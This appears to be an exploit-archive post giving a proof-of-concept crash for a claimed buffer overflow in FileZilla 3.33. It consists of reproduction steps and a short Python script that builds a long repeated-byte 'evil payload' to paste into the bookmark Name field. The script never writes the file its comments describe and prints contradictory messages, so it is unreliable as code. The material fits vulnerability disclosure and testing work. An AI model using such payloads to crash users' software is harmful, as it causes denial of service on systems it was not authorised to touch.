FileZilla 3.33 Buffer Overflow

FileZilla version 3.33 suffers from a buffer overflow vulnerability.

MD5 | 7990ce5708a3bacdfcaaf6ae7cd8e40f

# Exploit Title: FileZilla 3.33 Buffer-Overflow (PoC)

# Author: Kagan Capar

# Discovery Date: 2018-10-10

# Software Link:

# Vendor Homepage :

# Tested Version: 3.33

# Tested on OS: Kali Linux 2018.3 x64

# Steps to Reproduce: Run the python exploit script, it will create a new

# file with the name "exploit.txt". Copy the content from "exploit.txt".

# Open new terminal and write "filezilla"

# Go to Bookmarks and Add bookmark or Ctrl + B

# Now paste the contents of "exploit.txt" into the fields. "Name:"

# Click "OK" after Click "Bookmarks" you will see a crash on terminal.


buffer = "\x50\x48\x52" * 1300

payload = buffer
print "[+] Creating %s bytes evil payload.." %len(payload)
print "[+] File created!"
print "File cannot be created"

Related Posts